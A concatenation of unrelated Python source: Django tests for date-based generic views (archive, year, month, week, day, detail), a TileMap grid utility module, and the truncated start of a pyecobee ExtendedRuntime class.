self.assertEqual(res.status_code, 404)
def test_allow_empty_archive_view(self):
Book.objects.all().delete()
res = self.client.get('/dates/books/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_archive_view_template(self):
res = self.client.get('/dates/books/template_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/list.html')
def test_archive_view_template_suffix(self):
res = self.client.get('/dates/books/template_name_suffix/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
def test_archive_view_invalid(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/dates/books/invalid/')
def test_archive_view_by_month(self):
res = self.client.get('/dates/books/by_month/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'month', 'DESC')))
def test_paginated_archive_view(self):
_make_books(20, base_date=datetime.date.today())
res = self.client.get('/dates/books/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()[0:10]))
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
res = self.client.get('/dates/books/paginated/?page=2')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['page_obj'].number, 2)
self.assertEqual(list(res.context['latest']), list(Book.objects.all()[10:20]))
def test_paginated_archive_view_does_not_load_entire_table(self):
# Regression test for #18087
_make_books(20, base_date=datetime.date.today())
# 1 query for years list + 1 query for books
with self.assertNumQueries(2):
self.client.get('/dates/books/')
# same as above + 1 query to test if books exist + 1 query to count them
with self.assertNumQueries(4):
self.client.get('/dates/books/paginated/')
def test_no_duplicate_query(self):
# Regression test for #18354
with self.assertNumQueries(2):
self.client.get('/dates/books/reverse/')
def test_datetime_archive_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/')
self.assertEqual(res.status_code, 200)
@requires_tz_support
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_archive_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted descending in index"""
_make_books(5, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(reversed(sorted(res.context['date_list']))))
class YearArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_year_view(self):
res = self.client.get('/dates/books/2008/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(2008, 10, 1)])
self.assertEqual(res.context['year'], datetime.date(2008, 1, 1))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
# Since allow_empty=False, next/prev years must be valid (#7164)
self.assertEqual(res.context['next_year'], None)
self.assertEqual(res.context['previous_year'], datetime.date(2006, 1, 1))
def test_year_view_make_object_list(self):
res = self.client.get('/dates/books/2006/make_object_list/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(2006, 5, 1)])
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
def test_year_view_empty(self):
res = self.client.get('/dates/books/1999/')
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/1999/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertEqual(list(res.context['book_list']), [])
# Since allow_empty=True, next/prev are allowed to be empty years (#7164)
self.assertEqual(res.context['next_year'], datetime.date(2000, 1, 1))
self.assertEqual(res.context['previous_year'], datetime.date(1998, 1, 1))
def test_year_view_allow_future(self):
# Create a new book in the future
year = datetime.date.today().year + 1
Book.objects.create(name="The New New Testement", pages=600, pubdate=datetime.date(year, 1, 1))
res = self.client.get('/dates/books/%s/' % year)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/allow_empty/' % year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
res = self.client.get('/dates/books/%s/allow_future/' % year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [datetime.date(year, 1, 1)])
def test_year_view_paginated(self):
res = self.client.get('/dates/books/2006/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2006)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_year.html')
def test_year_view_invalid_pattern(self):
res = self.client.get('/dates/books/no_year/')
self.assertEqual(res.status_code, 404)
def test_no_duplicate_query(self):
# Regression test for #18354
with self.assertNumQueries(4):
self.client.get('/dates/books/2008/reverse/')
def test_datetime_year_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/')
self.assertEqual(res.status_code, 200)
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_year_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted ascending in year view"""
_make_books(10, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/2011/')
self.assertEqual(list(res.context['date_list']), list(sorted(res.context['date_list'])))
class MonthArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_month_view(self):
res = self.client.get('/dates/books/2008/oct/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_month.html')
self.assertEqual(list(res.context['date_list']), [datetime.date(2008, 10, 1)])
self.assertEqual(list(res.context['book_list']),
list(Book.objects.filter(pubdate=datetime.date(2008, 10, 1))))
self.assertEqual(res.context['month'], datetime.date(2008, 10, 1))
# Since allow_empty=False, next/prev months must be valid (#7164)
self.assertEqual(res.context['next_month'], None)
self.assertEqual(res.context['previous_month'], datetime.date(2006, 5, 1))
def test_month_view_allow_empty(self):
# allow_empty = False, empty month
res = self.client.get('/dates/books/2000/jan/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2000/jan/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), [])
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['month'], datetime.date(2000, 1, 1))
# Since allow_empty=True, next/prev are allowed to be empty months (#7164)
self.assertEqual(res.context['next_month'], datetime.date(2000, 2, 1))
self.assertEqual(res.context['previous_month'], datetime.date(1999, 12, 1))
# allow_empty but not allow_future: next_month should be empty (#7164)
url = datetime.date.today().strftime('/dates/books/%Y/%b/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_month'], None)
def test_month_view_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60)).replace(day=1)
urlbit = future.strftime('%Y/%b').lower()
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
# allow_future = False, future month
res = self.client.get('/dates/books/%s/' % urlbit)
self.assertEqual(res.status_code, 404)
# allow_future = True, valid future month
res = self.client.get('/dates/books/%s/allow_future/' % urlbit)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['date_list'][0], b.pubdate)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['month'], future)
# Since allow_future = True but not allow_empty, next/prev are not
# allowed to be empty months (#7164)
self.assertEqual(res.context['next_month'], None)
self.assertEqual(res.context['previous_month'], datetime.date(2008, 10, 1))
# allow_future, but not allow_empty, with a current month. So next
# should be in the future (yup, #7164, again)
res = self.client.get('/dates/books/2008/oct/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_month'], future)
self.assertEqual(res.context['previous_month'], datetime.date(2006, 5, 1))
def test_month_view_paginated(self):
res = self.client.get('/dates/books/2008/oct/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_month.html')
def test_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/')
self.assertEqual(res.status_code, 200)
def test_month_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/no_month/')
self.assertEqual(res.status_code, 404)
def test_previous_month_without_content(self):
"Content can exist on any day of the previous month. Refs #14711"
self.pubdate_list = [
datetime.date(2010, month, day)
for month, day in ((9, 1), (10, 2), (11, 3))
]
for pubdate in self.pubdate_list:
name = str(pubdate)
Book.objects.create(name=name, slug=name, pages=100, pubdate=pubdate)
res = self.client.get('/dates/books/2010/nov/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 10, 1))
# The following test demonstrates the bug
res = self.client.get('/dates/books/2010/nov/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 10, 1))
# The bug does not occur here because a Book with pubdate of Sep 1 exists
res = self.client.get('/dates/books/2010/oct/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['previous_month'], datetime.date(2010, 9, 1))
def test_datetime_month_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 2, 1, 12, 0))
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
BookSigning.objects.create(event_date=datetime.datetime(2008, 6, 3, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/')
self.assertEqual(res.status_code, 200)
@skipUnlessDBFeature('has_zoneinfo_database')
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_month_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 2, 1, 12, 0, tzinfo=timezone.utc))
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
BookSigning.objects.create(event_date=datetime.datetime(2008, 6, 3, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/')
self.assertEqual(res.status_code, 200)
def test_date_list_order(self):
"""date_list should be sorted ascending in month view"""
_make_books(10, base_date=datetime.date(2011, 12, 25))
res = self.client.get('/dates/books/2011/dec/')
self.assertEqual(list(res.context['date_list']), list(sorted(res.context['date_list'])))
class WeekArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_week_view(self):
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_week.html')
self.assertEqual(res.context['book_list'][0], Book.objects.get(pubdate=datetime.date(2008, 10, 1)))
self.assertEqual(res.context['week'], datetime.date(2008, 9, 28))
# Since allow_empty=False, next/prev weeks must be valid
self.assertEqual(res.context['next_week'], None)
self.assertEqual(res.context['previous_week'], datetime.date(2006, 4, 30))
def test_week_view_allow_empty(self):
# allow_empty = False, empty week
res = self.client.get('/dates/books/2008/week/12/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2008/week/12/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['week'], datetime.date(2008, 3, 23))
# Since allow_empty=True, next/prev are allowed to be empty weeks
self.assertEqual(res.context['next_week'], datetime.date(2008, 3, 30))
self.assertEqual(res.context['previous_week'], datetime.date(2008, 3, 16))
# allow_empty but not allow_future: next_week should be empty
url = datetime.date.today().strftime('/dates/books/%Y/week/%U/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_week'], None)
def test_week_view_allow_future(self):
# January 7th always falls in week 1, given Python's definition of week numbers
future = datetime.date(datetime.date.today().year + 1, 1, 7)
future_sunday = future - datetime.timedelta(days=(future.weekday() + 1) % 7)
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
res = self.client.get('/dates/books/%s/week/1/' % future.year)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/week/1/allow_future/' % future.year)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['week'], future_sunday)
# Since allow_future = True but not allow_empty, next/prev are not
# allowed to be empty weeks
self.assertEqual(res.context['next_week'], None)
self.assertEqual(res.context['previous_week'], datetime.date(2008, 9, 28))
# allow_future, but not allow_empty, with a current week. So next
# should be in the future
res = self.client.get('/dates/books/2008/week/39/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_week'], future_sunday)
self.assertEqual(res.context['previous_week'], datetime.date(2006, 4, 30))
def test_week_view_paginated(self):
week_start = datetime.date(2008, 9, 28)
week_end = week_start + datetime.timedelta(days=7)
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__gte=week_start, pubdate__lt=week_end)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__gte=week_start, pubdate__lt=week_end)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_week.html')
def test_week_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/week/no_week/')
self.assertEqual(res.status_code, 404)
def test_week_start_Monday(self):
# Regression for #14752
res = self.client.get('/dates/books/2008/week/39/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['week'], datetime.date(2008, 9, 28))
res = self.client.get('/dates/books/2008/week/39/monday/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['week'], datetime.date(2008, 9, 29))
def test_datetime_week_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/week/13/')
self.assertEqual(res.status_code, 200)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_week_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/week/13/')
self.assertEqual(res.status_code, 200)
class DayArchiveViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_day_view(self):
res = self.client.get('/dates/books/2008/oct/01/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'tests:templates/book_archive_day.html')
self.assertEqual(list(res.context['book_list']),
list(Book.objects.filter(pubdate=datetime.date(2008, 10, 1))))
self.assertEqual(res.context['day'], datetime.date(2008, 10, 1))
# Since allow_empty=False, next/prev days must be valid.
self.assertEqual(res.context['next_day'], None)
self.assertEqual(res.context['previous_day'], datetime.date(2006, 5, 1))
def test_day_view_allow_empty(self):
# allow_empty = False, empty month
res = self.client.get('/dates/books/2000/jan/1/')
self.assertEqual(res.status_code, 404)
# allow_empty = True, empty month
res = self.client.get('/dates/books/2000/jan/1/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [])
self.assertEqual(res.context['day'], datetime.date(2000, 1, 1))
# Since it's allow empty, next/prev are allowed to be empty months (#7164)
self.assertEqual(res.context['next_day'], datetime.date(2000, 1, 2))
self.assertEqual(res.context['previous_day'], datetime.date(1999, 12, 31))
# allow_empty but not allow_future: next_month should be empty (#7164)
url = datetime.date.today().strftime('/dates/books/%Y/%b/%d/allow_empty/').lower()
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_day'], None)
def test_day_view_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60))
urlbit = future.strftime('%Y/%b/%d').lower()
b = Book.objects.create(name="The New New Testement", pages=600, pubdate=future)
# allow_future = False, future month
res = self.client.get('/dates/books/%s/' % urlbit)
self.assertEqual(res.status_code, 404)
# allow_future = True, valid future month
res = self.client.get('/dates/books/%s/allow_future/' % urlbit)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), [b])
self.assertEqual(res.context['day'], future)
# allow_future but not allow_empty, next/prev must be valid
self.assertEqual(res.context['next_day'], None)
self.assertEqual(res.context['previous_day'], datetime.date(2008, 10, 1))
# allow_future, but not allow_empty, with a current month.
res = self.client.get('/dates/books/2008/oct/01/allow_future/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['next_day'], future)
self.assertEqual(res.context['previous_day'], datetime.date(2006, 5, 1))
# allow_future for yesterday, next_day is today (#17192)
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
res = self.client.get('/dates/books/%s/allow_empty_and_future/'
% yesterday.strftime('%Y/%b/%d').lower())
self.assertEqual(res.context['next_day'], today)
def test_day_view_paginated(self):
res = self.client.get('/dates/books/2008/oct/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['book_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10, pubdate__day=1)))
self.assertEqual(list(res.context['object_list']), list(Book.objects.filter(pubdate__year=2008, pubdate__month=10, pubdate__day=1)))
self.assertTemplateUsed(res, 'tests:templates/book_archive_day.html')
def test_next_prev_context(self):
res = self.client.get('/dates/books/2008/oct/01/')
self.assertEqual(res.content, b"Archive for Oct. 1, 2008. Previous day is May 1, 2006")
def test_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/01/')
self.assertEqual(res.status_code, 200)
def test_day_view_invalid_pattern(self):
res = self.client.get('/dates/books/2007/oct/no_day/')
self.assertEqual(res.status_code, 404)
def test_today_view(self):
res = self.client.get('/dates/books/today/')
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/today/allow_empty/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['day'], datetime.date.today())
def test_datetime_day_view(self):
BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
@requires_tz_support
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_day_view(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
# 2008-04-02T00:00:00+03:00 (beginning of day) > 2008-04-01T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 1, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 200)
# 2008-04-03T00:00:00+03:00 (end of day) > 2008-04-02T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 2, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/')
self.assertEqual(res.status_code, 404)
class DateDetailViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_date_detail_by_pk(self):
res = self.client.get('/dates/books/2008/oct/01/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Book.objects.get(pk=1))
self.assertEqual(res.context['book'], Book.objects.get(pk=1))
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
def test_date_detail_by_slug(self):
res = self.client.get('/dates/books/2006/may/01/byslug/dreaming-in-code/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], Book.objects.get(slug='dreaming-in-code'))
def test_date_detail_custom_month_format(self):
res = self.client.get('/dates/books/2008/10/01/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], Book.objects.get(pk=1))
def test_date_detail_allow_future(self):
future = (datetime.date.today() + datetime.timedelta(days=60))
urlbit = future.strftime('%Y/%b/%d').lower()
b = Book.objects.create(name="The New New Testement", slug="new-new", pages=600, pubdate=future)
res = self.client.get('/dates/books/%s/new-new/' % urlbit)
self.assertEqual(res.status_code, 404)
res = self.client.get('/dates/books/%s/%s/allow_future/' % (urlbit, b.id))
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['book'], b)
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
def test_invalid_url(self):
self.assertRaises(AttributeError, self.client.get, "/dates/books/2008/oct/01/nopk/")
def test_get_object_custom_query(self):
"""
Ensure that custom querys are used when provided to
BaseDateDetailView.get_object()
Refs #16918.
"""
res = self.client.get(
'/dates/books/get_object_custom_query/2006/may/01/2/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Book.objects.get(pk=2))
self.assertEqual(res.context['book'], Book.objects.get(pk=2))
self.assertTemplateUsed(res, 'tests:templates/book_detail.html')
res = self.client.get(
'/dates/books/get_object_custom_query/2008/oct/01/1/')
self.assertEqual(res.status_code, 404)
def test_datetime_date_detail(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0))
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
@requires_tz_support
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Nairobi')
def test_aware_datetime_date_detail(self):
bs = BookSigning.objects.create(event_date=datetime.datetime(2008, 4, 2, 12, 0, tzinfo=timezone.utc))
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
# 2008-04-02T00:00:00+03:00 (beginning of day) > 2008-04-01T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 1, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 200)
# 2008-04-03T00:00:00+03:00 (end of day) > 2008-04-02T22:00:00+00:00 (book signing event date)
bs.event_date = datetime.datetime(2008, 4, 2, 22, 0, tzinfo=timezone.utc)
bs.save()
res = self.client.get('/dates/booksignings/2008/apr/2/%d/' % bs.pk)
self.assertEqual(res.status_code, 404)
|
|
__all__ = ('Coord', 'TileMap')
from collections import defaultdict, namedtuple
from filters import is_tile
class TileMapStorage(object):
def __init__(self, width, height):
self.width = width
self.height = height
self.tiles = []
for y in range(self.height):
self.tiles.append([0] * self.width)
def __getitem__(self, subscript):
assert isinstance(subscript, Coord)
return self.tiles[subscript.y][subscript.x]
def __setitem__(self, subscript, value):
assert isinstance(subscript, Coord)
self.tiles[subscript.y][subscript.x] = value
def copy(self):
storage = self.__class__(width=self.width, height=self.height)
storage.tiles = []
for y in range(self.height):
storage.tiles.append(list(self.tiles[y]))
return storage
class Coord(namedtuple('Coord', ['x', 'y'])):
@classmethod
def from_tuple(cls, tup):
if isinstance(tup, cls):
return tup
else:
return cls(tup[0], tup[1])
@classmethod
def range(cls, c1, c2):
for y in range(c1[1], c2[1]):
for x in range(c1[0], c2[0]):
yield Coord(x, y)
@classmethod
def width(cls, c1, c2):
return abs(c1[0] - c2[0])
@classmethod
def height(cls, c1, c2):
return abs(c1[1] - c2[1])
def __add__(self, other):
return self.__class__(self[0] + other[0], self[1] + other[1])
def __sub__(self, other):
return self.__class__(self[0] - other[0], self[1] - other[1])
def __mul__(self, scalar):
return self.__class__(self[0] * scalar, self[1] * scalar)
def __neg__(self):
return self.__class__(-self[0], -self[1])
Coord.X = Coord(1, 0)
Coord.Y = Coord(0, 1)
class TileMap(object):
"""Subscriptable, editable view onto a TileMap."""
def __init__(self, tl=None, br=None, width=0, height=0, storage=None):
if tl is None:
tl = Coord(0, 0)
else:
tl = Coord.from_tuple(tl)
if br is None:
br = Coord(tl.x + width, tl.y + height)
else:
br = Coord.from_tuple(br)
if storage is None:
storage = TileMapStorage(width, height)
assert isinstance(storage, TileMapStorage)
assert tl.x >= 0
assert tl.y >= 0
assert tl.x < br.x
assert tl.y < br.y
assert br.x <= storage.width
assert br.y <= storage.height
self.storage = storage
self.tl = tl
self.br = br
@property
def width(self):
return Coord.width(self.tl, self.br)
@property
def height(self):
return Coord.height(self.tl, self.br)
@classmethod
def clone(cls, tile_map):
return cls(tl=tile_map.tl, br=tile_map.br, storage=tile_map.storage)
def to_other(self, coord, other):
return Coord(coord.x + self.tl.x - other.tl.x,
coord.y + self.tl.y - other.tl.y)
def _local_to_storage(self, coord):
return Coord(coord.x + self.tl.x, coord.y + self.tl.y)
def _storage_to_local(self, coord):
return Coord(coord.x - self.tl.x, coord.y - self.tl.y)
def _parse_subscript(self, subscript):
if isinstance(subscript, slice):
assert isinstance(subscript.start, tuple)
assert len(subscript.start) == 2
assert isinstance(subscript.stop, tuple)
assert len(subscript.stop) == 2
subscript = (
slice(subscript.start[0], subscript.stop[0]),
slice(subscript.start[1], subscript.stop[1]),
)
assert isinstance(subscript, tuple)
assert len(subscript) == 2
x, y = subscript
width, height = (1, 1)
if isinstance(x, slice):
start, stop, step = x.start, x.stop, x.step
if start is None: start = 0
if stop is None: stop = self.width
if step is None: step = 1
assert step == 1
width = stop - start
x = start
if isinstance(y, slice):
start, stop, step = y.start, y.stop, y.step
if start is None: start = 0
if stop is None: stop = self.height
if step is None: step = 1
assert step == 1
height = stop - start
y = start
if x < 0 or x + width > self.width or \
y < 0 or y + height > self.height or \
width == 0 or height == 0:
raise IndexError(subscript)
return Coord(x, y), Coord(x + width, y + height)
def __str__(self):
lines = ['']
for y in range(self.tl.y, self.br.y):
line = []
for x in range(self.tl.x, self.br.x):
line.append('%3s' % repr(self.storage[Coord(x, y)]))
lines.append(' '.join(line))
return '\n '.join(lines)
def __getitem__(self, subscript):
"""Return the value at (x, y), or a subview of the range (if either x or y is a slice)."""
tl, br = self._parse_subscript(subscript)
if Coord.width(tl, br) == 1 and Coord.height(tl, br) == 1:
tl = self._local_to_storage(tl)
return self.storage[tl]
else:
return self.subview(tl=tl, br=br)
def __setitem__(self, subscript, value):
"""Set the value at (x, y), or fill the range (if either x or y is a slice) with the value."""
tl, br = self._parse_subscript(subscript)
if isinstance(value, TileMap):
for coord in Coord.range(tl, br):
coord = self._local_to_storage(coord)
other_coord = Coord(coord.x - tl.x, coord.y - tl.y)
other_coord = value._local_to_storage(other_coord)
self.storage[coord] = value.storage[other_coord]
else:
if Coord.width(tl, br) == 1 and Coord.height(tl, br) == 1:
tl = self._local_to_storage(tl)
self.storage[tl] = value
else:
self.subview(tl=tl, br=br).fill(value)
def __contains__(self, value):
if isinstance(value, TileMap):
raise TypeError("__contains__ does not support TileMaps yet.")
for coord, __ in self.find(is_tile(value)):
return True
return False
def get(self, subscript):
try:
return self[subscript]
except IndexError:
return None
def find(self, predicate):
"""
Return an iterable of `(coordinate, data)` for which
`predicate(tile_map, coord)` returns a not False `data`.
"""
for coord in Coord.range(self.tl, self.br):
tile = self.storage[coord]
arg = self._storage_to_local(coord)
data = predicate(self, arg)
if data:
yield (arg, data)
def cast_until(self, start, increment, predicate):
"""
Return the first coordinate from `start` in steps
of `increment` where `predicate(tile_map, coord)` returns True.
Raises ValueError if the predicate never returned True.
"""
coord = start
end = self._storage_to_local(self.br)
def in_range(coord):
return (coord.x < end.x and coord.y < end.y)
while in_range(coord) and not predicate(self, coord):
coord += increment
if in_range(coord):
return coord
else:
raise ValueError("Coordinate matching predicate not found.")
def copy(self):
subview = self.subview()
subview.storage = self.storage.copy()
return subview
def fill(self, value):
for coord in Coord.range(self.tl, self.br):
self.storage[coord] = value
def subview(self, tl=None, br=None):
"""Return a subview at the given location (default top left) and size (default maximum)."""
if tl is None:
tl = Coord(0, 0)
else:
tl = Coord.from_tuple(tl)
if br is None:
br = Coord(self.width, self.height)
else:
br = Coord.from_tuple(br)
tl = self._local_to_storage(tl)
br = self._local_to_storage(br)
return self.__class__(tl=tl, br=br, storage=self.storage)
def linearize(self):
"""Return a linear iterable of all values in this tile map."""
return (self.storage[coord] for coord in Coord.range(self.tl, self.br))
def split_x(self, x):
"""Return a pair of views that are the halves of the tile map split vertically at `x`."""
assert 0 <= x < self.width
return (
self.subview(tl=Coord(0, 0), br=Coord(x, self.height)),
self.subview(tl=Coord(x, 0), br=Coord(self.width, self.height))
)
def split_y(self, y):
"""Return a pair of views that are the halves of the tile map split horizontally at `y`."""
assert 0 <= y < self.height
return (
self.subview(tl=Coord(0, 0), br=Coord(self.width, y)),
self.subview(tl=Coord(0, y), br=Coord(self.width, self.height))
)
|
|
"""
This module is home to the ExtendedRuntime class
"""
from pyecobee.ecobee_object import EcobeeObject
class ExtendedRuntime(EcobeeObject):
"""
This class has been auto generated by scraping
https://www.ecobee.com/home/developer/api/documentation/v1/objects/ExtendedRuntime.shtml
Attribute names have been generated by converting ecobee property
names from camelCase to snake_case.
A getter property has been generated for each attribute.
A setter property has been generated for each attribute whose value
of READONLY is "no".
An __init__ argument without a default value has been generated if
the value of REQUIRED is "yes".
An __init__ argument with a default value of None has been generated
if the value of REQUIRED is "no".
"""
__slots__ = [
'_last_reading_timestamp',
'_runtime_date',
'_runtime_interval',
